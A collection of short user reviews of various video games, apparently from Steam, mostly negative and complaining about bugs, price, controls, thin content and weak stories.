Although this game is 'story rich', I dont think the story is very good. Its full of cliches (writer with writer's block, boy wants to play, dad wants to work, mom tries to hold family together, etc) and extremely superficial. You make choices but they dont mean anything when the consequence is just text at the end of the scene. Its just so...predictable. All the kid ever wants to do is play, so, shocker, when you dont play with him he gets depressed. So what? Why am I suppose to care about the kid at all? The game doesnt give you any reason to like any of the characters.And we are suppose to believe that Dan is so busy he cant do anything else with his wife and kids but. . . hes not. He sits around the house all day, goes camping, fishing. In one chapter they show a schedule. It has 8 hours sleep, 1 hour break, 2 hours decompression. Really? Thats 11 hours where hes doing nothing. Real busy people rest half that amount on any given workday.I really hate to hammer an indie game. But it has a steep price tag so people should know what theyre in for. And for what it gives you there are better options out there. Gods Will Be Watching is a brilliant game about choices and consequences, with much better dialogue and characters that felt. . . alive. Or if you like walking simulators with notes all over, I would even recommend Gone Home before this, which has a very cute story, is the same length, and doesnt have you revisiting the same 4 rooms 15 times.
I was going to recommend this game, it started off just a fun and charming "Where's Waldo" like game. But as the game progressed through time a level called "Native Attack" came up, and it was full of stereotyping and historical inaccuracies that gets people killed. Looking through the reviews now I'm seeing some other reviewers bringing up this issue, as one put it  "They mashed up stereotypical items that are from completely different tribes. Having the American Indians all dancing around is similar to drawing smiling slaves. They're trying to protect their land."There is a complete lack of sensitivity for this topic, colonizers came on to their land and fought and killed them, calling this level "Native Attack" shows a complete lack of empathy and understanding on the matter, what else are you expected to do when someone forces you out of you home land.Because this issue has been brought up before and it has been in the game for so long I do not feel I can recommend it.
Needs online multiplayer options. Its 2020, in a pandemic, this would be a great game if I could play online with friends who I can't be around in person at the moment.
The Culling Of The Cows is the best example of a great idea but executed poorly. Not everyone can stomach that weird clunky control &amp; the horrible enemies that came in rainbow colors. People were complaining about rock and roll tower defense being ugly and all that. here, this is a master-level of ♥♥♥♥ looking stuffs. intentionally or not, we'll never know. I was rudely taken by surprised that I was not able to move my character's aiming. I can only shoot horizontally and my enemies could move in zig zags. Is this design intentional ? I was also shocked to find out that I had to be reloading constantly, all throughout the campaign non-stop. 24 ♥♥♥♥♥♥♥ 7 all day long.This is the ultimate game challenge. Not the bloody cows/zombies. The ♥♥♥♥♥♥♥ shotgun that can only hold 8 bullets without upgrades.This product reminded me of another product which i reviewed not too long ago. A run and gun 2D game that suffers from major hit box issue. stupid horde mode. same ♥♥♥♥ for over xx maps. Well at least here we have mini-bosses/boss. For all the interesting and creative ideas, the controls pulled this product down. Badly. I feel like the entire experience, i am gimping myself .. this game isn't hard. It's hard because of its ♥♥♥♥♥♥♥ controls + cheap running horde mode. Which ultimately leads to a horrible gaming session.*face palm. rips hair* I can't do this. No. Just ♥♥♥♥♥♥♥ no. At this price, anyone who loves tower defense games like can look for better options in the current market. No hit box issue. no clunky controls. no cheap running horde mode.Take back the nazi ufo and all this rainbow crap. Go back to farm simulator. It's much more rewarding. and ♥♥♥♥ that giant finger too.
Sorry to say it it's just plain bad. I thought it looked interesting but it just has no decent gameplay. save your money
Just don't.... It is not a $30 game. I came in with super low expectations because I've never found that one fishing game that was perfect, but this game is not ready for release. Especially for the price tag. The UI is bad. The casting mechanics and execution is not good at all. Fighting the fish is almost non existient as you just real in. You can't reset keybinds and there are some you would really like to move. There is potential down the line for this game, but coming in at this price it is just not worth it.
I am at a loss for words, and not in a good way. I've played the other parts in this series and enjoyed them. Each had a progression from easy to moderate to difficult. This one?  Starts at the baby level AND STAYS THERE. Tiny box, just 4x4 letters. There is barely any challenge to begin with, yet two crutches are added: An icon practically gives you the answer, and you are made aware of the words' first letter from the outset, because instead of the ingenious categories this is how the levels are categorised now. That was still too easy for some, apparently - while you had to take a hint and pay for it through previously solved categories/puzzles if you got stuck in the earlier games, not so here: You always see the icon, and you always know the starting letter.Recommended for children, right after they've learned to read. It clearly isn't meant for adults. If English is your second or third language, you might give it a try, and graduate to one of the others.
Oh dear! I have had this game for a few years now and played it quite a bit and did enjoy it a few years ago.  I came back this week to see whether it had been updated............ My goodness, it is so badly maintained/updated and rehashed every year as a "new game" when it is not. If you want a game that is based on code from about 1990 then buy this game but do not fall for the fact it is renamed Train Simulator [insert year here] and it has anything like what you would expect in 2021. It is so laggy with mind numbingly bad graphics that will suck your CPU/graphics card out of all of its juice. I have a high end pc that easily plays todays latest games on full high graphics/resolution but cannot cope with this to any good degree.Onto the simulator itself. Do not expect any sort of realism folks. The stations may be named but do not think that they will look like anything they should. Also, all of the scenarios are based out of peak, rush hour time so hardly any trains and so no enjoyment or challenge. The timings are all out and you will be lucky to complete them in the time they state without a penalty because they are unrealistic. The trains are the same no matter what DLC you buy they just look different on the outside. Trying to use the editor to make your own scenarios requires a degree in tediousness and about three years of your life only for it to fail. Most mods and other DLCs require you to buy a lot of other trains you do not want or need to play them and then sometimes they still crash. Loading times can be anywhere from a minute to half an hour so have a book handy!Buy the game if you want to pretend to be a train driver [from the 1990s with little control due to the stuttering graphics] and do not mind any realism whatsoever.I do still play it as I bought it years ago but only when I am depressed and have drunk to much to notice how god awful this game still is!
Decent puzzle game with logical mechanics but it's easily finished within 1.5h. A lot of the levels feel like playing a tutorial hence the name Academy.Needs workshop support!
well....where can I get those ♥♥♥♥♥♥♥ diamonds? why did they make diamonds as necessary to upgrade things when they don't give enough of them? It is just ridiculous. 사지마세요 다이아몬드라고 업글할때 필수템 있는데 그거 충분하게 주지도 않음 카지노가서 뺑뺑이돌려야합니다.. 카지노가서 의미없는 룰렛돌리기 하고싶으시면 추천
Yeah, it's not good. Certainly not worth the full price. The music is loud and the voices are too quiet. Speaking of voices, the voice acting is pretty bad. The art is okay. The writing is pretty bad and the story feels too long.Just don't buy it.
Wanted MoreSo i bought this game when it was on offer at £2.69 (or there about) and to be honest it is only worth this much!What i wanted was in band augments, broken instruments, band members leaving, sex, drugs and rock’n’roll!!What i got is a very tame game in so far as no one falls out with anyone no one gets tired EVER!!! There is no time management in fact you can have you “band” work every day of every week of the year and they never drop from fatigue (i would recommend that you DO work them every day), on top of this you can get them to rehearsal and write songs (as they say no rest for the wicked).So start with one of 4 music types (but you can rehearse any of them, at any time) and start with a readymade band (that will never change), the game then gives you a few gigs to start and more will be added when you have a better fan base, once you have done gigs and opened up all the gig venues you can then move on to a new area of the world.There is no “skill” as all you have to do is work the band every day, rehearsal, rehearsal, rehearsal then write song, record song, update gig song list with new hit, once money is high enough buy better equipment (and since this never breaks down or get’s stolen you never have to buy again) then repeat until you have enough money to move to the next area on the map!Once you have moved to a new area you have the chance to tour the old area (which makes money) and again as nothing bad EVER happens on tour it is always better to do this as soon as you can. The game needs more a LOT more to make it worth anything other than the £2.69
Very buggy and the game appears to be abandoned. I was hoping to see this develop as it's a cute idea.
Would be a good game for someone who enjoys chess, checkers, or varied board games. However not me, but good job. Its a decent looking game for someone more low  key.
Game has serious issues, the bumpers lag, trying to change options can crash it to desktop, the sound can infinite loop at one single point for no reason, also it seems abandoned.Do your karma a favour and buy the dollar menu at your local MD's and give it to the homeless instead.
omg, this was so bad. wandering, eating a bush, drinking, sleeping. that was about it. i was looking forward to liking the game, but either i missed something or nothing happens. not much else i can even say.1 star out of 5.
Wasn't a bad game but not worth the price tag and community is dead.  If you can get it on sale and play with friends then it's worth $5 but otherwise I would skip this one.
I found this one so boring. It was the first ND game I couldn't finish and that's saying a lot considering I even got through trail of the twister.
Almost puke-inducing movement, no idea what the goal is.
Broken beyond all playability. DO NOT BUY until devs fix (which doesn't seem likely).
Do not buy this game! The author did nothing with his own hands. 3D models, textures, sounds are taken from the SGE engine library. Mediocre game! Neither the plot nor the imagination. In vain the money spent. The map is made unjustified too big. The game can lag even on a powerful computer. Level design is ugliness!
Multiplayer version is broken. It has been pointed out in numerous reviews and in the game discussion groups. This has been the situation for months but developer has taken no action nor responded to any comments. Sad because its a good little game.
I purchased hidden object bundle 5 in 1 on April 21, 2018 for my wife.  She has tried to play Behind the Reflections 2 Witchs Revenge numerous times and each time it force closes. Every time it force closes the length of time of play is less and less. This bundle was purchased for a VERY low price and not stressing over that, just want game bugs fixed pleaseAt this time we do not recommend the game
Nice game, it has potential,It maybe better to play with a controller.EditThe game seems like it has been dropped. nothing new since it came out.
I would advise buying a 2 dollar bullet and using it instead
guns still point downwards on oculus rift
Short and poorly balanced.  A few big bugs can ruin the game too.
There are much better games than this game, better optimized, nicer graphics, and the gameplay itself.
Several issues here, most are UI related... e.g. my input keys got stuck twice causing continuous scrolling of the playfield while it kept placing blocks currently held in mouse. The scrolling speed via keyboard is at turtle speed. Clicking blocks to open them (like loading coal into mines) quite often fail to do so. To me this game is unplayable in its current state. Had to refund as this game will need much more before i would reconsider it again.
I want to like the game, but due to the lack of players I can't. It's impossible to find a game online due to either the servers not working or so few people play the game no sessions pop up. It's extremely good in multiplayer as long as you have the controllers (or parsec) and the amount of people actually wanting to play. I'll change my review if the game gets more players but for now playing online is not possible due to the lack of players. If you're searching for online in this game exclusively then I can't not suggest this game enough. If you do have some friends in a local setting, though, couch play will be possible.
Based on the first half hour of game play...This game is not fun for adults. Suitable for 3-5 year old age group perhaps. First 30 minutes clicking back and forth on mail packages and trees that a lumberjack collects. I only played that long because I thought soon.. there would be more to it.
I really want to like this game. It's pretty low-key and looks amazing. It's a great premise storywise, and the gameplay is right up my alley too. But in an hour of playing, I've encountered three bugs that left me frozen so that I had to restart the level. There are enough save points where this isn't too bad on its own; however, the controls and movement seemed "sticky" or unpolished, where I couldn't always tell if the problem was me, the hardware, or the game. And hey, I'm not always great at games, but the level design (winding and somewhat unclear) and the story/objectives (why are we talking to the other kids?) didn't really draw me in enough to where I wanted to keep going.
The concept behind this platformer is neat, but the game was unbelievably short.  For only a dollar, if you don't mind the incredibly short amount of gameplay (I beat the game within 20 minutes), it was fun, however I'm fairly disappointed by how few levels there were.
As I've said in the other games from this series I don't recommend buying it for the full price. If You had to buy one of the earlier games I've reviewed then I'd "beauty bounce" would be the best choice. It's still just some random dude opinion but the art style in all the early games from this series (I've seen 2020 games have a little better art style) and the stories in these games aren't really great either. The only reasons I'd recommend buying this game is for easy achievements or anime backgrounds other than that I'd say don't waste Your money. If You really want to then buy it on a sale.
This game.... look I tried everthing to get it to work for htc vive. It's not working don't waste your money.   I like to try and get crap to work and annoys me when I can't; but this is beyond me. I want a refund.
I want to l like this game, It's nostalgic, I love the way it reunites me with a history that I was a part of, seeing familiar faces I was ecstatic to be given one of my favorite teams to play. As soon as I saw my lineup of characters for the season 1-3 playthrough, I was  happy. It's really really disheartening to have the developer of this game decide that these players are the minimum rank, which means they can't equip any skills. It's heartbreaking kicking players that I know off of the team just because the game's maker decided that they can't advance in rank or skill. After doing that to test out the game's mechanics, and some saddening dialogue when I had to fire players, I  finally settled into beating the game with the team that I was given at the start. So far I've hit pro league with them, and I'm not  hitting a wall, I just spend a lot of time leveling them and raising their attributes, but I'd have still liked the ability to make it so they could use skills, as so that it didn't always display them as being the lowest tier. Also the game has limited replay value because it 's historical, with a cast of characters who are static. Always proficient with the same champs, have the same skills, have a slightly altered name that tells you who they really are, always start at the same level with the same stats. A random mode would solve a lot of my issues, because then I could disconnect from them and optimize the way the game wants me to. They wouldn 't be people that I have known since the rise of LCS. But, it would rob the game of it's  historical richness and significance that it draw from.Maybe someday the dev will read this, the game itself is good and fun if a little hard to read and understand at times, and some of the ways it abstracts and arbitrates things are good for it as a game (roles dont perform like they do in league of legends, champions only offer teamwide buffs or specific buffs when historic power-combos are made) The game is especially worth playing if you have never followed esports and have no attachment to figures in it,  or if you have missed some era of LCS and want to see some of the influencial historical figures. It is fun, I enjoy it, but there are problems that I have with the core experience of it.
Hydraulic Empires tries to be a lot of things. It's trying to capture the fun tower defense of Defense Grid and the skill building of Sanctum all in something remeniscent of a Steampunk look. Having played the games that it's trying to be, Hydraulic Empires falls short.  I do like the hexagon element of the field planning...but that's about the only thing that stood out.
one ov the Worst "Thing" that i hav ever Played..Sloppy.. Lazy.. Shameless Developer and an Absolute Trash "Thing"..
Pros:-What few puzzles exist are all skippable, but none are all too hard if you fiddle with them long enough-It is refreshing to see a point and click that isn't heavily drenched in humorCons:-Short (I probably have on record twice the required time due to doing other things while the game was up)-Saving is important because crashing is spontaneous. VMware might help mitigate this issue-It's not a TV show. If someone wears the same outfit, that clearly isn't a uniform, for over a fortnight then it's just lazy design, but I guess in it's day in age -Conversations are specific to plot only-I want to say great things about the plot..... but some of the thief antics seemed half-baked, the end is poor (setting up for a sequel that probably never came) and seems only like the start and middle of a story.-Lazy naming convention
The guy who develop this game just abandoned it and now comes with a new game. Don't buy this one nor his new game
I didn't notice it in the video/screenshots but the title bar is always visible and on top of other windows and their title bars.  That is surely a deal breaker for anyone who runs apps full screen (even briefly) or wants to use their computer in any way.All visual elements are always on top so they cover up what you're doing.There also doesn't seem to be a way of saving the state, so each time you run the application, you start with a fresh slate and need to add/position/setup elements again and again.  There is also no alpha blending done, so the edges of all the elements are pretty jaggy.  Nice idea, bad implentation (so far)
this game was so cute I puked rainbow!im gay now
Stupid game that is just a bad version of angry birds (which is free...).
Nothing more than a basic puzzle game. Really bad neck strain from looking down all the time. Horrible glitch where the stars don't pick up if you are zoomed too far in. The board seems to migrate out of the play area. Controls are awkward and occasionally unresponsive. Just a poo game all round
I really cannot recommend this game because:- You can get it for FREE on Android;- The game is just too simplistic;- Gets boring after 15-30 minutes, at least you can get a refund after that time,- Obvious mobile port, developer cannot be bothered to change words like "tap" where it is appropriate on mobile game to "click" where it is appropriate on PC.
So, after playing (or wasting) 16+ hours, I came to realise I was rather becoming more and more frustrated as the game progressed. The initial enthusiasm soon was gone.This is a actually decent try that unfortunately fails halfway to win the RPG gamer's heart... Because, graphically, the game is indeed undoubtedly gorgeous, whereas, technically, the battle system is deeply flawed. The character progression cannot be seen clearly as the characters become stronger. I felt as if there was no consistency.
not really fun
There is a physics problem for some levels (or those are badly designed) so you need to rely on luck more than your skills and logic.For example level 55: click only the black cube on the top middle and wait for the blue ball to roll, restart the level, do the exact same thing again (and again and again) and you'll have a different outcome almost everytime.The other Oik games were fun but this one is a "no" for me, because even if you do everything right (good timing and order) it can randomly not work, for no reason.ps: I never write reviews but it was so bad, I had to for this game.
Someone decided to make ANOTHER crap re-make of Flappy Bird but this time...They added ear rape noise and flashy neon lights.
You dodge letters from Alice in Wonderland to collect more letters that form the phrase 'Rabbit Hole'. The game explains this terribly and it controls even worse. I'm not sure why this was made but hey, if you feel like wasting $1.97, pick this up. If you want to not be frustrated, disoriented and possibly sickened, skip this.
Very pretty, but really slippery controls and the gimmick doesn't really add anything. Frustrating and boring, ultimately not worth your time.
The controls are really bad in my opinion
Rubbish, don't buy it! Also requesting a refund. I have no idea where these positive reviews have come from!
DescriptionDynetzzle is a minimalist puzzle game entirely devoted to the spatial ability test of cube folding that you often see in IQ tests (where you're given a flattened cube and have to fold it in your head to find which faces are opposite). There are 25 levels of increasing difficulty with color-coded entwined dice you have to number correctly, thereby folding a lot of cubes mentally.Pros Interesting mechanics (entwined and split dice) make the spatial ability test a lot more challenging and engaging than it is in IQ tests Interface is minimalist, slick and out of your way Very small price tagCons Missed opportunity for procedurally generated levels Missed opportunity for achievements (I must admit I'd like to show off having solved all 25 levels...) A bit annoying to have to cycle through all numbers instead of typing them in or picking them from a listVerdictI can only recommend Dynetzzle if you are a puzzle game junkie, looking for a fix that is a tad original.However, I think Dynetzzle lacks too many features, even at its bargain price, for me to recommend it to the general population.
Maze Simulator
It keeps crashing, takes my whole system down.
I don't feel like there was enough for the price tag of the game.  The concept is brilliant, but it honestly feels like Early Access and I was sad to realize there was no more.I feel like if this is fleshed it could really be a fantastic game.  In it's current state tho at the current price I do not think it's worth it.
The game looked really cool when I first bought it but can't even play it. It just stops at the main menu and after that I can't click anything or even start it up. Not even shut it down. Not without alt+f4 anyways. Broken game.
I mean it's a really cool idea, and I did somewhat enjoy it, but there are a lot of bugs.And like they are really "game breaking" bugs *in my opinion* - Just because raising my kittens to adulthood was my goal, and 2/3 of them got stuck in terrain. One in a rock and the other in a bed of water. :/ And it wasn't like I could pick them up to pull them out, I spent a while trying to save the one in the rock, but because they couldn't move, they starved to death. The kitten in the water, that was quitting time for me. :PHonestly if you want to play a game where you play as a big cat and raise your kittens.. Go play Paws: A shelter 2 game. This game was a nice idea but not as good as Paws. I did however like the variety of animals (prey and enemy) in this game!
When I first started up this game, it felt surprisingly old. Well, that's probably because it's from 2009, not 2014 as the steam page incorrectly says. But okay, it's not like hidden object games have made a lot of progress recently.So with that out of the way... I still wouldn't have liked this game 5 years ago. It seems to be aimed at girls age 5-7 or something like that. Most of the puzzles are overly simple, and some are even more illogical than you'd expect from this type of game, like "let's make a potion to cure this room!". Erm, no thanks. Also, I completed it in less than 2 hours despite getting stuck for a good while because I missed a room and couldn't figure out how to move on as only rooms you've been in are marked on the map.The one good thing this game does is marking a room as clear once you've found everything in it. Unless you enjoy searching for pixels everywhere when you get stuck, I suppose.But yeah, there's so many better hidden object games for a similar price. I see no reason to get this one.
Theoretically I should like this. I love laser/mirror puzzles, and I try a lot of short, discounted puzzle games from Steam sales. I really tried to like Lazors, but I just... don't. Maybe that's just me though.A few issues I've had:Too often, I've solved a puzzle by accident while just trying to clear space and figure out what the options are. I think that's probably a worse feeling than being stuck.The little laser target spots which you have to light up, are drawn underneath the blocks. In some levels, you have to shuffle blocks around just to even find out where the targets are all hiding, and then try to remember where they are.The levels are small, and you're often dealing with several lasers at once, which means that moving a single block can massively change where all the lasers end up. It's hard to reason about, and hard to plan ahead for. You can't really work towards a solution, only fiddle with it until it works.The hints system is frustrating. You can get unlimited hints if you're willing to wait long enough, but a hint is just the game putting a single block in the final position. Sometimes it simply highlights that a block is already in the right position, which I guess is maybe helpful, but really it's just annoying that you have to wait another minute to roll the dice on getting a useful hint.Presentation-wise I think it's fine. It feels like it could be really close to being fantastic, but I just can't enjoy it. :(If you're into puzzles, I'd really recommend Hexcells instead.
Can't recommend. Runs in slow motion most of the time, especially at level start. Thats at lowest settings. Admittedly my laptop is not the fastest but it can run "Crimzon Clover" without any troubles, also "Saviors" which also has been made with unity, i believe. Both games are shmups with much better graphics than this.Also that christmas theme... ...dont force stuff like that on your players.
The gameplay is boring and the game has broken English.At one point I came out of a door and immediately got caught by an enemy with no chance to evade him. What the hell? If the game doesn't restart from the beginning every game over, that might not be a big deal.What a disappointment, even though it's a solo project.
I rarely write reviews -- and that's usually because I like most everything in VR; however, this just missed that margin by a hefty amount. Honestly, what they're trying to do here is a bit difficult to make fun without the physicality of hitting something. More power to them for trying, but I definitely threw money away on this thing. I would ask for a refund if I was a D-bag, but I won't -- I 'd rather them use their funds to grow as a company and provide other experiences in the future. Perhaps they will grow as well, but at the very least they will provide more interesting concepts. What I will do, though, is contact steam and see if they can remove the game from my library -- once again, without requesting a refund. I'm just picky about what I have in my library. Best of luck to you, Mr. Game creators. May you learn from your experience and make your next endeavor much better. 
I can appreciate it for being one of the original VR dance/rhythm games, but it does not hold up to today when you have much better options. You have two options in the game, the original story mode, which is basically where dragons throw colored balls at you. The dragons are really pretty, but it all seems a bit random and out of place and I never really felt like I was "dancing".The second option is a free mode, in which they don't seem to have any songs of their own (the UI is also a confusing mess to navigate). It's more all player made maps, which means you might find something you like if you dig far enough but there seems to be no ranking, so you will have no idea if the map you pick is actually *good* or not. Even with some of the expert and expert + maps I played, I didn't really get that dance feeling like you do in something like Audio Trip, Beat Saber, or Synth Riders, unfortunately. I appreciate the fact that apparently it supports LIV mixed reality and foot trackers, but unfortunately I could get neither working with this particular game. The avatar in LIV would work, but then after a few seconds of being in the game it would be obscured by black screen. Holodance also could not pick up my foot trackers despite giving them roles in the Steam VR settings.
I got this because one of the reviews says it plays like Mario Tennis. It absolutely does not.I've played just about every popular tennis game. Mario Tennis, Top Spin, Virtua Tennis, Wii Sports are all good in their own way thanks to solid mechanics. Smoots World Cup Tennis's mechanics are awful: unresponsive controls, low shot variety, inconsistent ball speed and bounce, no spin, useless lobs, etc. Rallies end up looking very dumb.Also, there's no mouse support, and the menus are needlessly difficult to navigate through with keyboard or controller. This is a PC exclusive by the way.What else... oh yeah, the characters all make the same high-pitched moan every time they hit the ball. Very annoying.
Poker rules, which are simple, are implemented incorrectly. For instance, the big blind can't raise on pre-flop and blinds don't seem to increase.Bet calling isn't implemented correctly either. When everyone starts with 100 chips and they all go all-in, there shouldn't be a side pot. However, this game... finds... a way.Opponent decision making is terrible, timid and aggravating. There is no bluffing.To be frank, the characters in this game aren't appealing either.When you saw this game and assumed it was bad, you were correct.My search for a good solo poker game continues, but Poker Night at the Inventory or Governor of Poker series are immediately better. For the anime cleavage that is the crux of this game's 'design' you could do better, pretty much anywhere. If you get this for more than $0.50 you've over payed.
A decent "puzzle" concept which was poorly executed. Despite its appearance as a puzzle game, Kolumno is more of an exercise on low-forgiveness button pressing. This game falls sadly between the likes of Celeste and any standard puzzle game. In Celeste, your goal and each step to attain that goal are fairly obvious throughout the game. Because everything is clearly laid out, the challenge is in timing and execution - and this is good only because everything is clearly laid out. Meanwhile, puzzle games generally lack time pressure and execution is at your pace, with the solution needing to be produced by you.Kolumno takes both of these concepts and makes for an un-engaging and frustrating experience. Each level (past the introductory levels, where the 4 abilities are introduced to you) requires absolute pinpoint timing. A few fractions of a second early or late is a guaranteed failure. Again, like in Celeste, this is OK if everything you need to do is absolutely clear. However, in this game, each level requires you to figure out exactly when to execute, in addition to how. As a result, in levels where multiple abilities are available for use, there's the risk of you trying to execute the wrong solution and being unsure if you are wrong about the order of operations or the timing of what you're doing. Failure, in a game meant to fail you, is a solid driving force when you are able to learn what you did wrong. When it's unclear why you are losing or what you should change, frustration is quick to emerge.To avoid going on longer than this game deserves - in summary, I cannot recommend this game as levels are too finicky, timings are too unforgiving, the abilities are few and played out by the end of the (short) game, and overall, I simply didn't enjoy playing.
The first Lost Lands game starts with Susan as a normal mom with a hidden strength that makes her a hero in an alternate magical world. After the first game, she always got called back to the world by her reliable wizard friend, and they would fight evil as comrades in arms. Fairly formulaic, but that's why I found the games so relaxing. This game sees Susan return with an edgy makeover, and worst of all, she has become a cold-blooded killer. Her newfound dark side messes up the timeline and makes and enemy out of her once reliable companion. Compared to the rest of the series, this game was so stressful for me to play; Susan's decisions made no sense to me. This game was so disappointing to me that I will research very carefully before buying any sequel.
This game is extremely basic.  There is nothing new here that compels me to spend a lot of time trying to beat each level.  Typical type towers with no imagination.  The levels are basic in that they require almost no thought into where to put the 'splash' tower, 'ice' tower, and quick 'arrows'.  Same same same.  This was a nice attempt at Ironhides great TD games.  I'm only happy to say I bought this on sale.
Falsely advertises as having multiplayer along side local multiplayer. Does not have multiplayer.
Looks like a really fun timewasting game. But unfortunatly after buying the game if you want to use anything other than a pistol you have to pay again. shame.
I'm in Room 6 now, so far there are several levels with multiple possible solutions and I had to guess which combo is the correct one -- I play Flippix all the times and never encounter this type of problem. Apparently this game is seriously flawed -- it is meant to be a game about logic and should NOT have to involve guessing. I'd NOT recommend this game.
Game needs work. No option to change controls, controls screen doesn't stay on long enough to read everything. Physics seems a bit off, especially the reverse gear power. This game wasn't for me sadly.
my daughter and i so disappointed
Won't work off-line have to be on steam or else game crashes graphics for numbers atrocious supposed to be hand drawn pencil very difficult to see
I just can't play this game, everytime i get an different crash, "TypeError: cannot read property 'undefined' of undefined", or "TypeError: cannot read property 'RPG-Theme' of undefined" and it just keeps crashing, i'm really trying to play this thing, but it just doesn't want to be played. I somehow managed to get to Elvira, but if i try to go back to town, gear up and grind some levels, bang, another crash, it's completely unplayable and i'm really tired of retrying over and over again.
I only needed ten minutes with Lucidity to see what it was all about. Some games are like that, they put everything they have right out from the get-go and don't ever push past that foundation. Lucidity certainly starts with plenty of promise in its storybook world and charming presentation. It's just when you actually get down to playing it that it falters.The game opens in a quaint little house on a hill, where a little girl lives with her doting grandma. Your wee lass nods off while reading tales of adventure, and dreams of traveling to fantastical faraway lands. This is where the action is, in the dreams of this young lady, and it's up to you to help her get through her adventure in one adorable piece. And maybe collect some fireflies, too!I'm sure that all sounds peachy until you play it. See, Lucidity is one of those platformers where you don't actually control your character. Sofi (her name is Sofi, I had to look that up) trundles along to the right at a steady clip, only stopping if she literally runs into a wall. Otherwise she'll happily plunge off a cliff or smack face-first into a dream wasp. There's no jumping, no ducking, and while we're on the subject there's no way to speed up her slow stroll, either.To help her not toddle into certain death like an idiot, you get to place objects in the world that protect her. These include planks and stairs to walk on, springs and fans to launch her, and bombs that can clear enemies away and take chunks out of solid surfaces. You don't get to place these freely, though, because each item is chosen for you, one at a time, Tetris-style. You can bank one item for later use but in general you're going to be working with whatever the game decides to give you at the moment.I suppose this could work with some clever level design but that's the last thing you're going to get here. Levels are vast expanses of blocky platforms and pits of death and enemies that require some quick thinking when placing objects. Honestly placing objects is always going to require quick thinking, because as slow as Sofi is she doesn't tend to give you much room to work with on her teeny-tiny platforms hanging in a deadly void. There's a huge amount of vertical space to explore as well, with elevated areas that you're only going to get to with a lucky combination of springs and fans anyway.The end result just isn't any fun, and it's dragged even further down by a conspicuous lack of polish. The art style is a flat papier mache style but coupled with the sharp, straight lines that comprise platforms, levels end up looking like cheap vector art. Some of the backgrounds are nice to look at but others feature some terrible and distracting color combinations. The worst offender is your own interface, with flat yellow silhouettes for your objects, and flat blue silhouettes for the ones you place. It seriously looks like placeholder art, lacking any sort of effects or continuity with the world.Platformers with indirect control are always a dicey proposition because the threshold for frustration is so much lower. You feel like most of the game is out of your hands, leaving you to simply react to what someone else is doing. Something like Kirby's Canvas Curse worked wonderfully because you had a huge amount of control over your character and the world around him, just in an indirect manner. That's not at all the case here, where you can't even choose how to save Sofi from her own stupidity, you just throw whatever you have at her and hope for the best. Coupled with the unpleasant level design and inconsistent art, Lucidity is more of a nightmare than the dream walk it's supposed to be.Did you enjoy this review? I certainly hope so, and I certainly hope you'll check out more of them at https://goldplatedgames.com/ or on my curation page!
惡名系統簡直離譜! 別人佔了我城我奪回也增惡名是什麼玩法?! 還有佔據城池會增加惡名,所以我要勝利的話就是打野戰而不打城池嗎?然後戰爭得分80%有多也強迫不了對方割城池,那是要怎樣發展?!
I bought the game over Christmas.  It is... not good.  In my first 2 incomplete play throughs (both stopped due to game-breaking bugs), I found huge UI issues, multiple serious bugs/performance issues, and a smattering of typos &amp; basic english mistakes.  On top of that, the basic gameplay loop is just kind of boring.  In general I'm a huge fan of board games and indie games, but this not a good example of either.  It needs a large amount of rework and polish before I'd consider it ready for a general release.
Motion Sickness Warning!I want to love this game, but the automatic camera makes me sick like no other game has. PLEASE give us manual camera control with the right stick! Without it, I'm not going to be able to play this game and can't recommend it to others. :(
Good story but  the beginning train part really turn me off... its kinda retarded really doing the same thing over and over again.
Okay so the gameplay is simple yet fun and the game itself holds no microtransactions (that I have found). Nothing really wrong there.But the save system appears to be almost completely broken. Basically the only thing that saves is unlocked maps and target progress on a bar to making the next shark in line available to purchase with in-game currency. Any items and sharks you've purchased and equipped get reset along with your stats and high scores. I mean it's not so bad as you can re-purchase most if not all the sharks you did earn using the default 1500 gold that also resets upon game exit, but that's still pretty bad. On top of that, the game is seriously overpriced. Frankly, it's $50 for a game that would be worth maybe around $15 at most.I will edit my review and change it to positive if the devs fix the save system if the resetting save is in fact a bug and maybe lower the price without seriously breaking anything else in the game, but this is a bad release right now. Even Shantae Half-Genie Hero Ultimate Edition had a better release than this.
What is even going on in this game.  The English is translated poorly, and it's still better here than Nightmare of Melanie or The Cage (they're all by this same team).  If you don't read Chinese, stay away from all three of these games!  It says it's also available in English, it's not really.  The translation in this one is terrible and the other two it's non-existent past the opening.
Balancing is pretty bad, but it's fun to play for a little while every so-often.And the story mode is pretty bad.Modding the game is great, though.
At first, Radical Heroes: Crimson City Crisis seemed like it was going to end up being a clone of River City Ransom with a few minor differences. The basic combat is there (punch, kick, jump) as are the weapons that you can pick up and throw or bash your enemies over the head with. The graphics are even similar to those of the NES experience, although I prefer the old art style to this one. Overall, a River City Ransom clone would have been great as I was a huge fan.Unfortunately, this game turned out to be only a skeleton of those ideas. In RCR, food not only healed you, but increased your stats, it was the way that character progression took place and you saved up your money to buy the foods to build the stats that you enjoyed. In Crimson City, food solely heals you while you put a point into fewer available stats that are less diverse and interesting. The basics of the stores are present here which includes locations where you can purchase new abilities but the massive number of options is no longer present and the fantastic atmosphere of RCR is not present; this does not feel like a real world that you're a part of, it's more of a bland combination of paths with random enemies spawning for each level, separated by a checkpoint that you need to hunt for a key card to open.There are a number of positive reviews comparing the game to River City Ransom but these seem to be the hopes and dreams of people who share the same nostalgia that I do and wanted to support the game for its possibilities, not its current state. The heart and soul of a game like RCR is not here and that only becomes more apparent when you see that the developer shifted the price from $8 to $2 mid-production and never responded to those who had bought the game and asked if it was still going to be an $8+ experience.In short, this game was clearly inspired by River City Ransom but ended up being so bare bones that it's hardly recognizable as such. The mechanics that are here are bland and uninspired and a better experience, even of just simply side-scrolling beat 'em ups, can be found in many others games that are available.
tfw infinite friction ♥♥♥♥♥ you over
The required use of the middle button without any type of reassignment means it is impossible to play on a laptop without a mouse.Also impossible to play on my computer as the middle button on that is broken
should be a free flash game
The game has stopped working in wins 10
Its a fun game still verry early and needs a lot of work but the concept is good and i look foward to seeing how this developes. BUT However it seems to suffer from a lack of content and can be bugy but that is understandable in early acsess. so at this time i cannot recomend this game.
The game is very fun to play. You can play with your friends and people online. The only problem is that there is a bug. When you return from battles, you get items. These items are crucial to the game. The problem occurs when you leave the game. If you leave the game, your items disappear and any other stats you received. This makes the game a whole lot less fun to play, so it is not recommended, unless, you don't care if you lose all of your progress every time you quit. If this problem is solved, I will be happy to update my review and have more positive feedback.
I bought the game even with that ridiculous price tag thinking that at least it would be like the mobile version. It is way inferior to the mobile version where you can have graded games. This is a joke, right?
Needs updated controls for valve index controllers.
